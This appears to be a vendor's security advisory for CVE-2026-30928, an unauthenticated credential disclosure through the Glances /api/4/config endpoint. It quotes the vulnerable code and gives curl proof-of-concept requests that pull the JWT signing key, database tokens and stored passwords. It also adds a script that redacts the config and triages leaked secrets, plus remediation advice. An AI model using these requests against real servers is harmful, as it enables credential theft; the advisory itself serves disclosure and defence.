CVE-2026-30928

CVE-2026-30928 is a high-severity information-disclosure vulnerability in the glances Python package (pip), affecting versions < 4.5.1. It is fixed in 4.5.1.

Summary

The /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() without filtering or redacting sensitive values. That file holds the credentials for every configured export backend, including database passwords, API tokens, JWT signing keys and SSL key passwords. Because the web server only applies authentication when it was started with a password, the default deployment serves all of this to any client that can reach the port.

Details

Root Cause: The as_dict() method in config.py iterates over every section and every option in the ConfigParser and returns them all as a nested dictionary (section → option → value). No sensitive-key filtering or redaction is applied, so whatever is in glances.conf is returned verbatim.

Affected Code:

  • File: glances/outputs/glances_restful_api.py, lines 1154-1167

    def _api_config(self):
        """Glances API RESTful implementation.

        Return the JSON representation of the Glances configuration file
        HTTP/200 if OK
        HTTP/404 if others error
        """
        try:
            # Get the RAW value of the config' dict
            args_json = self.config.as_dict()  # <-- Returns ALL config including secrets
        except Exception as e:
            raise HTTPException(status.HTTP_404_NOT_FOUND, f"Cannot get config ({str(e)})")
        else:
            return GlancesJSONResponse(args_json)

  • File: glances/config.py, lines 280-287

    def as_dict(self):
        """Return the configuration as a dict"""
        dictionary = {}
        for section in self.parser.sections():
            dictionary[section] = {}
            for option in self.parser.options(section):
                dictionary[section][option] = self.parser.get(section, option)  # No filtering
        return dictionary

  • File: glances/outputs/glances_restful_api.py, lines 472-475 (authentication is optional: the API router only gets the authentication dependency when Glances was started with --password, so the default web server answers every client unauthenticated)

    if self.args.password:
        router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])
    else:
        router = APIRouter(prefix=self.url_prefix)  # No authentication!

PoC

  1. Start Glances in default webserver mode (no password, bound to all interfaces):

    glances -w
    # Glances web server started on http://0.0.0.0:61208/

  2. From any network-reachable host, retrieve the whole configuration, credentials included:

    # Get entire config including all credentials
    curl http://target:61208/api/4/config

  3. Extract specific secrets via the section-level and item-level config paths:

    # Get JWT secret key for token forgery
    curl http://target:61208/api/4/config/outputs/jwt_secret_key

    # Get InfluxDB token
    curl http://target:61208/api/4/config/influxdb2/token

    # Get all stored server passwords
    curl http://target:61208/api/4/config/passwords
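The following is an added example, not Glances project code, serving both the Details section (the unfiltered as_dict() walk) and the PoC (triaging what a captured /api/4/config response actually exposed). It parses a constructed glances.conf with ConfigParser, reproduces the verbatim section → option → value dump beside a redacting variant, and lists the "section/option" paths whose values look like credentials. The sample values, the option-name patterns and the MASK string are assumptions of this example; they do not reproduce the filtering that Glances 4.5.1 applies.

```python
"""Added example, not Glances project code: reproduce the unfiltered
as_dict() behaviour described in Details against a constructed glances.conf,
put a redacting variant beside it, and triage a captured /api/4/config
response for exposed credentials. The option-name patterns and sample
values below are assumptions of this example."""
import configparser
import re
from typing import Dict, List

# Constructed sample config. Section and option names follow the ones the
# advisory refers to; every value is a placeholder, not a real credential.
SAMPLE_CONF = """
[outputs]
jwt_secret_key = example-jwt-signing-key
max_processes_display = 25

[influxdb2]
host = influx.internal
port = 8086
token = example-influx-token
org = monitoring

[passwords]
localhost = 5f4dcc3b5aa765d61d8327deb882cf99

[network]
hide = lo
"""

MASK = "***REDACTED***"
# Assumed classification of "secret-looking" options; Glances 4.5.1's own
# filtering is not reproduced here.
SENSITIVE_OPTION = re.compile(r"password|passwd|secret|token|api_key", re.IGNORECASE)
SENSITIVE_SECTIONS = {"passwords"}  # every option in [passwords] is a credential


def load_conf(text: str) -> configparser.ConfigParser:
    """Parse an INI-style config; interpolation off so '%' in secrets stays literal."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    return parser


def is_sensitive(section: str, option: str) -> bool:
    """True when the whole section or the option name marks the value as a credential."""
    return section in SENSITIVE_SECTIONS or bool(SENSITIVE_OPTION.search(option))


def as_dict_unfiltered(parser: configparser.ConfigParser) -> Dict[str, Dict[str, str]]:
    """Same shape as the vulnerable as_dict(): every option, value verbatim."""
    return {
        section: {option: parser.get(section, option) for option in parser.options(section)}
        for section in parser.sections()
    }


def as_dict_redacted(parser: configparser.ConfigParser) -> Dict[str, Dict[str, str]]:
    """Hardened variant: same structure, sensitive values replaced by MASK."""
    result: Dict[str, Dict[str, str]] = {}
    for section in parser.sections():
        result[section] = {}
        for option in parser.options(section):
            value = parser.get(section, option)
            result[section][option] = MASK if is_sensitive(section, option) else value
    return result


def find_exposed_secrets(config: Dict[str, Dict[str, str]]) -> List[str]:
    """Triage helper for a captured GET /api/4/config body (already parsed from
    JSON): return 'section/option' paths whose value is a non-empty, unredacted
    credential. An empty list means nothing credential-like was exposed."""
    exposed: List[str] = []
    for section, options in config.items():
        for option, value in options.items():
            if is_sensitive(section, option) and value and value != MASK:
                exposed.append(f"{section}/{option}")
    return exposed


if __name__ == "__main__":
    parser = load_conf(SAMPLE_CONF)
    leaked = as_dict_unfiltered(parser)
    print("exposed by unfiltered as_dict():", find_exposed_secrets(leaked))
    print("exposed after redaction:", find_exposed_secrets(as_dict_redacted(parser)))
```

To triage a real instance, feed the JSON body from step 2 through json.loads() into find_exposed_secrets(); every path it returns is a credential that should be treated as disclosed. The redacting variant keeps non-secret settings readable so an operator can still confirm the running configuration without the secret material.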

Impact

Full Infrastructure Compromise: Database credentials (InfluxDB, MongoDB, PostgreSQL/TimescaleDB, CouchDB, Cassandra) give direct access to every connected backend data store, and a leaked JWT signing key lets an attacker forge API tokens for the Glances instance itself.

Affected versions

glances (< 4.5.1)

Security releases

glances → 4.5.1 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade glances to 4.5.1 or later to resolve this vulnerability. In addition, run the web server with a password so the API router gets its authentication dependency (the --password option shown in the affected code above), and do not expose port 61208 on untrusted networks. Any credentials stored in glances.conf on an instance that was reachable without authentication should be treated as disclosed and rotated.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-30928? CVE-2026-30928 is a high-severity security vulnerability in glances (pip), affecting versions < 4.5.1. It is fixed in 4.5.1.
  2. Which versions of glances are affected by CVE-2026-30928? glances (pip) versions < 4.5.1 are affected.
  3. Is there a fix for CVE-2026-30928? Yes. CVE-2026-30928 is fixed in 4.5.1. Upgrade to this version or later.
  4. Is CVE-2026-30928 exploitable, and should I be worried? Whether CVE-2026-30928 is exploitable in your environment depends on whether the vulnerable code is present and reachable; for this issue that means whether the Glances web server is running, whether it was started without a password, and who can reach its port. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-30928 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-30928? Upgrade glances to 4.5.1 or later.

Other vulnerabilities in glances

CVE-2026-53925, CVE-2026-46611, CVE-2026-46608, CVE-2026-46607, CVE-2026-46606
